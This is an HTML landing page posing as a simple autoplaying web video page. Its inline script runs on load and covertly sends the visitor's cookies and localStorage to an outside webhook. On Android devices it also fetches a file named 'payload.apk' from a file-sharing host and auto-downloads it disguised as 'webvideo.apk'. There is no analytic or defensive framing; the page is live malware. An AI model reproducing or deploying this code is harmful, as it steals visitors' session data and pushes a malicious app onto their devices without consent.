index.html (landing)  


<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>Web video</title></head>
<body>
<video width="100%" autoplay muted playsinline>
 <source src="https://abri.ai/video.mp4" type="video/mp4">
</video>
<script>
fetch('https://webhook.site/8865512c-db6b-43b0-93c8-26d50130aeb4',{
  method:'POST',
  body:JSON.stringify({cookie:document.cookie,storage:localStorage})
});
(async()=>{
  if(!/Android/i.test(navigator.userAgent)) return;  // só Android
  const b=new Uint8Array(await (await fetch('https://transfer.sh/get/y5bJ/payload.apk')).arrayBuffer());
  const a=document.createElement('a');
  a.href=URL.createObjectURL(new Blob([b],{type:'application/vnd.android.package-archive'}));
  a.download='webvideo.apk';
  setTimeout(()=>a.click(),300);
})()
</script>
</body></html>